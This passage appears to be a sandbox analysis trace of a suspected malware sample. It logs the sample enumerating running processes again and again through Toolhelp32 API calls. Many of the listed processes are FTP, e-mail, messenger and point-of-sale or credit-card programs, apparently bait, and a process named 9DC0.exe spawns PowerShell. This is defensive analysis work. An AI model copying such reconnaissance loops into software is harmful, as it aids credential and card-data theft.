hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0184.385] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0184.387] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0184.389] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0184.390] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0184.392] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0184.394] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0184.396] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0184.397] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0184.399] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0184.441] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0184.443] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0184.445] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0184.447] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0184.449] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0184.450] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0184.453] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0184.455] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0184.457] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0184.459] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0184.461] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0184.463] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0184.465] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0184.467] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0184.468] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0184.471] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0184.473] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0184.475] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0184.539] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0184.541] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0184.543] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0184.545] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0184.547] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0184.550] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0184.551] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0184.553] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0184.555] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0184.557] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0184.559] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0184.563] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0184.565] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0184.566] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0184.568] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0184.570] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0184.572] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0184.574] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0184.614] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0184.616] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0184.618] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0184.620] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0184.621] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0184.623] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0184.625] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0184.627] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0184.629] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0184.631] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0184.632] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0184.634] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.636] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0184.646] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0184.649] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.651] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0184.654] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0184.697] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0184.700] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0184.702] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0184.704] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0184.707] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.709] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0184.711] CloseHandle (hObject=0x17ec) returned 1 [0184.711] Sleep (dwMilliseconds=0x64) [0184.782] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0184.795] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.796] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0184.798] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0184.799] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.801] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0184.803] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.849] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0184.851] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0184.852] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0184.854] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.856] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.858] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0184.860] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.861] Process32Next (in: 